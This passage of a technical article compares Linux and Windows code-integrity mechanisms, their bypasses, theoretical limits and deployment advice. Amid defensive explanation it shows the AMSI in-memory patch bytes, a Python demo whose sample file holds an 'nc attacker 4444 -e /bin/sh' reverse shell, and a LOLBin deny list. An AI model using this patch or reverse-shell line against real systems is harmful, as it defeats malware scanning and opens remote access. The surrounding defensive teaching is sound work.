The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the [System.Reflection] namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the amsiInitFailed flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point, introduced in Windows 11 version 22H2, that brings application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours, during which Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled -- by user, by policy, or by the auto-disable rule -- it can only be re-enabled by a clean install of Windows; a Settings > Reset This PC is not sufficient.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.
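The cost structure behind that rule is the Merkle construction itself. A toy Python sketch (this skips fs-verity's salting, padding, and on-disk descriptor format; `BLOCK`, `merkle_tree`, and `verify_block` are illustrative names): building the tree reads everything once, but checking any single block touches only O(log n) sibling hashes.

```python
import hashlib

BLOCK = 4096  # fs-verity's default Merkle leaf size

def merkle_tree(data: bytes) -> list:
    """Hash tree over fixed-size blocks; tree[0] is the leaf level."""
    level = [hashlib.sha256(data[i:i + BLOCK]).digest()
             for i in range(0, len(data), BLOCK)]
    tree = [level]
    while len(level) > 1:
        level = [hashlib.sha256(b"".join(level[i:i + 2])).digest()
                 for i in range(0, len(level), 2)]
        tree.append(level)
    return tree

def verify_block(block: bytes, index: int, tree, root: bytes) -> bool:
    """Check one block against the root: O(log n) sibling hashes, not O(n)."""
    h = hashlib.sha256(block).digest()
    for level in tree[:-1]:
        sib = index ^ 1
        if sib < len(level):
            left, right = (h, level[sib]) if index % 2 == 0 else (level[sib], h)
            h = hashlib.sha256(left + right).digest()
        else:                      # lone node at the end of an odd-length level
            h = hashlib.sha256(h).digest()
        index //= 2
    return h == root

data = bytes(range(256)) * 48          # 12 KiB = three 4 KiB blocks
tree = merkle_tree(data)
root = tree[-1][0]                     # the constant-size digest a measure ioctl returns
assert verify_block(data[8192:], 2, tree, root)
assert not verify_block(b"tamper" + data[6:BLOCK], 0, tree, root)
```

A verifier that stores only `root` can check any 4 KiB page on demand, which is what makes lazy per-page verification of large files affordable.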

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in.

What the canonical AMSI patch looks like in x64 assembly

The simplest in-memory patch overwrites AmsiScanBuffer's prologue with a six-byte sequence that loads AMSI_RESULT_CLEAN (0) into EAX and returns:

xor eax, eax    ; 31 C0
ret             ; C3

or, depending on the calling convention the patcher targets:

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.
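The comparison a patch detector performs is not much deeper than matching those byte sequences. A hedged Python sketch (the real Defender detection rides ETW and reads the target process's memory; `classify_prologue` and the clean-prologue bytes here are invented for illustration):

```python
from typing import Optional

# First bytes of the two canonical AmsiScanBuffer patches shown above.
PATCH_SIGNATURES = {
    bytes.fromhex("31c0c3"):       "xor eax, eax; ret",
    bytes.fromhex("b857000780c3"): "mov eax, 0x80070057; ret (E_INVALIDARG)",
}

def classify_prologue(prologue: bytes) -> Optional[str]:
    """Return the matched patch name, or None if the prologue looks intact."""
    for sig, name in PATCH_SIGNATURES.items():
        if prologue.startswith(sig):
            return name
    return None

# An untouched x64 prologue starts with ordinary register/stack setup...
assert classify_prologue(bytes.fromhex("4c8bdc49895b08")) is None
# ...while a patched one trips a signature on the very first bytes.
assert classify_prologue(bytes.fromhex("b857000780c390")) is not None
```

The flip side of such cheap detection is equally cheap evasion: any semantically equivalent instruction sequence with different bytes slips past an exact-prefix match, which is why this arms race never terminates.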

The WDAC LOLBin arms race

Microsoft's App Control bypass list is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and deploying it through Intune. The asymmetry is the bottom line: trust is granted at signer granularity, but exploitation happens at binary granularity. The deny list is not a fix; it is a treadmill.

LOLBin (Living-Off-the-Land Binary)

A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: mshta.exe to evaluate HTA scripts, regsvr32.exe to execute a remote scriptlet, installutil.exe to run code via a designed-for-development assembly loader.

The fapolicyd permissive window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.
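The custody argument reduces to a few lines. A toy Python model (deliberately simplified: real EVM HMACs several security xattrs together with inode number, generation, uid, gid, and mode, and the key lives in a kernel keyring, ideally sealed to TPM PCRs -- the names below are illustrative):

```python
import hashlib
import hmac

EVM_KEY = b"hmac-key-held-in-kernel-keyring"  # never on disk in a sane config

def ima_xattr(content: bytes) -> bytes:
    """security.ima: hash of the file content, stored next to the file."""
    return hashlib.sha256(content).digest()

def evm_xattr(ima: bytes, inode_meta: bytes, key: bytes) -> bytes:
    """security.evm: keyed HMAC over the xattr plus inode metadata."""
    return hmac.new(key, ima + inode_meta, hashlib.sha256).digest()

meta = b"ino=131074 uid=0 gid=0 mode=0755"
good = b"#!/bin/sh\necho ok\n"
evil = b"#!/bin/sh\n/bin/nc attacker 4444 -e /bin/sh\n"

stored_evm = evm_xattr(ima_xattr(good), meta, EVM_KEY)

# Offline attacker rewrites the file AND sets security.ima = hash(evil),
# so an IMA-only appraisal (content hash vs xattr) is satisfied...
forged_ima = ima_xattr(evil)
assert hashlib.sha256(evil).digest() == forged_ima
# ...but the kernel's recomputed HMAC over the forged xattr no longer
# matches the stored security.evm, and without the key it cannot be forged.
assert not hmac.compare_digest(stored_evm, evm_xattr(forged_ima, meta, EVM_KEY))
```

Swap `EVM_KEY` for a file sitting on the same disk and the model collapses: the attacker reads the key and recomputes `stored_evm` along with everything else, which is exactly the worst-case configuration the paragraph above describes.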

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

| Bypass class | Linux instance | Windows instance | Root cause | Partial mitigation |
| --- | --- | --- | --- | --- |
| Verifier shares address space with attacker | (script interpreters; no in-kernel interpreter scanner) | AMSI prologue patch, amsiInitFailed flag flip | Software-only protection of an in-process secret is impossible | ETW patch detection, signed providers, Constrained Language Mode |
| Trust grant coarser than exploit unit | RPM trust pre-fapolicyd integrity-mode addition | WDAC Publisher rules + LOLBins | Trust algebra cannot express "Microsoft except mshta" with one rule | Hash-level denies, growing block list |
| Reference value reachable by attacker | IMA without EVM | (HVCI moved the kernel verifier out of reach) | Reference value next to the file under attacker control | EVM HMAC sealed to TPM PCR |
| Verifier is killable | fapolicyd daemon failure | (HVCI verifier is hypervisor-isolated) | Verifier liveness is part of the trust assumption | TPM-sealed boot policy + kernel-mode fallback |

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from these pivots is consistent: when an architecture is forced to put the verifier somewhere the attacker can reach, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.
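Stripped to its skeleton, that shared substrate fits in a few lines. The point of this sketch (Python; the hook name and file contents are invented) is what the gate does not ask: there is no "is this malicious?" branch anywhere, only set membership, because Rice's theorem says the former question has no general answer.

```python
import hashlib

# The operator's trust decision, made ahead of time: digests of producers
# (here, whole-file hashes; signer identities work the same way).
ALLOWLIST = {
    hashlib.sha256(b"contents of /usr/sbin/nginx").hexdigest(),
    hashlib.sha256(b"contents of /usr/bin/trusted-tool").hexdigest(),
}

def exec_hook(file_content: bytes) -> bool:
    """Fail-closed gate: membership in the allowlist, nothing else."""
    return hashlib.sha256(file_content).hexdigest() in ALLOWLIST

assert exec_hook(b"contents of /usr/sbin/nginx")
assert not exec_hook(b"a brand-new, possibly benign binary")  # refused anyway
```

Note the second assert: a perfectly benign but unlisted binary is refused identically to malware, because the gate is deciding provenance, not behaviour.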

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.

The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

  • Any preimage-resistant hash needs Ω(n) work on the data being hashed. You cannot verify a file you do not read.
  • A Merkle tree with leaf size k over a file of size n reduces this to O(log(n/k)) per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
  • Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly 2 GB/s per core; SHA-512 at roughly 1.4 GB/s. A 100 MB binary verifies in roughly 50 ms worst-case and 0 ms cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no single best policy, because the right policy depends on the threat model: there is no dominant point in the design space, only trade-offs.

| Bound | What it says | Mechanism that matches it | Remaining gap |
| --- | --- | --- | --- |
| Rice's theorem | "Is this binary malicious?" is undecidable | Every CI stack is an allowlist + signer model | Allowlist composition is itself a policy problem |
| In-process secret | No purely-software defence inside the attacker's address space | HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM | AMSI design violates this; the gap is structural |
| Hash verification | Ω(n) per full read; O(log n) per partial read | fs-verity per page; IMA cached on i_version | Cold-cache cost remains O(n) for non-fs-verity files |
| JIT and dynamic code | No way to verify code that did not exist on disk | None | Restricted-runtime modes (CLM, AppContainer) are the best partial answer |
| Asymmetric verify | About 60-300 µs per RSA-2048 or Ed25519 verify on modern x86 | Authenticode catalogues amortise; IMA caches in inode | Cold cache is the only sensitive case |

Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 and covered on LWN. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.
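The economics of the design can be miniaturised in Python. This is a toy stand-in for the patchset's lookup primitive, not its implementation (the real work parses RPM headers and TLV digest lists in the kernel; the one-time signature verification over the list is elided here): one amortised trust decision per package, then a hash plus a set probe per open instead of a signature verify per open.

```python
import hashlib

# Vendor side: one signed digest list per package, not one signature per file.
package_payloads = [
    b"bytes of /usr/bin/a",
    b"bytes of /usr/bin/b",
    b"bytes of /usr/lib/libc.so",
]
digest_list = {hashlib.sha256(p).hexdigest() for p in package_payloads}
# ...verify the vendor's signature over digest_list ONCE here (elided)...

def digest_cache_lookup(file_content: bytes) -> bool:
    """Per-open cost collapses to a content hash plus an O(1) set probe."""
    return hashlib.sha256(file_content).hexdigest() in digest_list

assert digest_cache_lookup(b"bytes of /usr/bin/a")
assert not digest_cache_lookup(b"bytes of /usr/bin/a, tampered")
```

The content hash is still Ω(n) per cold read -- the bound from Section 8 does not move -- but the expensive asymmetric verify is paid once per digest list instead of once per file.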

By v6 in November 2024 the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list; memory safety of the TLV parser was verified with the Frama-C static analyser. As of late 2024 the work is not yet upstream.

"Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call makes an IPC round-trip to a service running outside the script host's address space. The in-process bypass family disappears because the attacker no longer shares a process with the scanner. The cost is a context switch plus serialisation overhead per script evaluation.
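A minimal sketch of the broker shape in Python -- multiprocessing standing in for the real IPC transport, marker matching standing in for a real engine, and every name invented. The property being demonstrated is the trust boundary: the verdict is computed in an address space the script host cannot patch.

```python
from multiprocessing import Pipe, Process

BAD_MARKERS = (b"Invoke-Mimikatz", b"amsiInitFailed")

def scanner(conn):
    """Runs in its own process; an in-host memory patch (the Section 7
    bypass family) cannot reach this code or its signature set."""
    buf = conn.recv()
    conn.send(any(marker in buf for marker in BAD_MARKERS))
    conn.close()

def scan_out_of_process(buf: bytes) -> bool:
    """One AmsiScanBuffer-style round trip: serialise out, verdict back."""
    parent, child = Pipe()
    worker = Process(target=scanner, args=(child,))
    worker.start()
    parent.send(buf)
    verdict = parent.recv()
    worker.join()
    return verdict

if __name__ == "__main__":
    assert scan_out_of_process(b"IEX (...); Invoke-Mimikatz -DumpCreds")
    assert not scan_out_of_process(b"Get-ChildItem C:\\")
```

The per-call process spawn is deliberately naive; a real broker would hold one long-lived service connection, and the residual cost of that connection is exactly the hot-loop latency trade-off discussed above.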

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

| Problem | Current best partial result | Upstream status |
| --- | --- | --- |
| IMA appraisal scale on RPM-signed distros | Integrity Digest Cache, 45-65% appraisal speedup | Patchset v6 (Nov 2024); not upstream |
| AMSI in-process trust boundary | Signed provider DLLs, ETW patch detection, CLM | Partial; structural fix would be OOP broker |
| Linux script-content scanning | Nothing in production | Open |
| Cross-OS attestation interop | TCG CEL, TDX/SEV-SNP quotes | Platform-layer; workload-level still split |
| WDAC LOLBin treadmill | Microsoft block list + LOLBAS + WDAC Wizard | Operational; structural fix unknown |

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

| If you need... | On Linux, use... | On Windows, use... |
| --- | --- | --- |
| TPM-backed remote attestation | IMA + EVM (TPM PCR 10) | Measured Boot + TPM PCR 11 + HVCI |
| Block unsigned drivers | module.sig_enforce=1 plus kernel module signing | HVCI (Memory Integrity) |
| Cryptographic allowlist of installed software | fapolicyd (RPM/DEB trust) | App Control with Publisher rules |
| Per-app sandbox | AppArmor or SELinux | AppContainer or App Control (no direct equivalent) |
| Catch in-memory PowerShell payloads | (no direct equivalent) | AMSI |
| Consumer-grade reputation gating | (no direct equivalent) | Smart App Control |
| Immutable appliance image | dm-verity + IPE | App Control with hash rules + HVCI |
| Large APK-style assets verified lazily | fs-verity | (no direct equivalent) |

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

Large lazy-loaded assets. Fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

  • IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
  • AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
  • SELinux: a debugging setenforce 0 that quietly becomes permanent. Remember that /.autorelabel is required after restoring contexts; track that you flipped the mode.
  • fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
  • WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
  • HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Drivers that allocate RWX kernel pages will fail to load under HVCI and can leave the host unbootable.
  • Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
  • Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

Frequently asked questions

Should I enable IMA appraise mode on a general-purpose Linux server?

Usually no, unless your distribution signs every system file (most do not for imasig in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.

Why does AppArmor work for me when SELinux gave me headaches?

Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.

Can I block all LOLBins with one WDAC policy?

No. Microsoft's block list grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.

Is AMSI worth enabling if it is bypassable?

Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.

Does HVCI hurt my battery life or performance?

On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer), the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim.

Will Smart App Control work on my Windows 11 enterprise laptop?

Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

Study guide

Key terms

IMA
Linux Integrity Measurement Architecture. Hashes files at LSM hook points; can measure (record into TPM PCR 10), appraise (block on mismatch), or audit.
EVM
Extended Verification Module. HMACs (or signs) the security xattrs IMA depends on, so an offline attacker who rewrites security.ima cannot also forge security.evm.
AppArmor
Path-based Linux MAC, merged to mainline in 2.6.36 (Oct 2010). Default on Ubuntu and SUSE. Profiles are loaded from user space and compiled to in-kernel DFAs.
SELinux
Label-based Linux MAC merged to mainline in 2.6.0 (Dec 2003). Default on RHEL, Fedora, Oracle Linux, Android. Type-enforcement on subject x object x class.
fapolicyd
Red Hat userspace allowlister sitting on the fanotify permission channel. Trust inherited from the RPM database; rules in /etc/fapolicyd/rules.d/.
fs-verity
Per-file Merkle-tree authenticity, Linux 5.4 (Nov 2019). O(log n) per-page verification; constant-time digest retrieval; supported on ext4, f2fs, btrfs.
IPE
Integrity Policy Enforcement, Linux 6.12 (Nov 2024). Property-based decisions: dm-verity root hash, fs-verity digest, initramfs origin. O(1) per access.
WDAC / App Control
Windows code-integrity policy mechanism, originally Device Guard (Windows 10 1507). Signed XML compiled to .p7b, evaluated at PE load. Renamed App Control for Business in 2024.
HVCI / Memory Integrity
Hypervisor-Protected Code Integrity. Kernel-mode CI check moved into VTL1 of Hyper-V, isolated from the VTL0 normal kernel. Same mechanism marketed under three names.
AMSI
Antimalware Scan Interface. In-process script-broker COM API (AmsiScanBuffer) called by PowerShell, WSH, VBA, MSHTA, UAC installer, .NET. Provider is Defender by default.
Smart App Control
Consumer-facing pre-baked WDAC policy shipped with Windows 11 22H2. 48-hour evaluation window, one-way disable, cloud reputation via the Intelligent Security Graph.
LSM
Linux Security Modules. Kernel framework merged Dec 2003 that hosts security modules at well-defined hook points. Hosts SELinux, AppArmor, IMA, EVM, IPE, BPF LSM, Landlock.
MAC
Mandatory Access Control. Kernel-enforced policy layer above DAC that no userspace privilege can override; the operator, not the file owner, sets policy.
TPM PCR 10
The TPM Platform Configuration Register IMA extends file-content hashes into. Monotonic, extendable as PCR_new = SHA256(PCR_old || hash); used as the anchor for remote attestation.
Authenticode
Microsoft's PE signing format. Anchors WDAC's Publisher, PcaCertificate, and LeafCertificate rule kinds; signed catalogues (.cat) provide pre-computed hashes for catalogued files.
LOLBin
Living-Off-the-Land Binary. A trusted binary, often vendor-signed, repurposed by attackers to bypass an allowlist (e.g. mshta.exe evaluating an HTA blob).
Constrained Language Mode
Reduced PowerShell language mode App Control forces with UMCI on. Blocks reflection, dynamic-type creation, and arbitrary .NET API calls; restricts evaluation surface.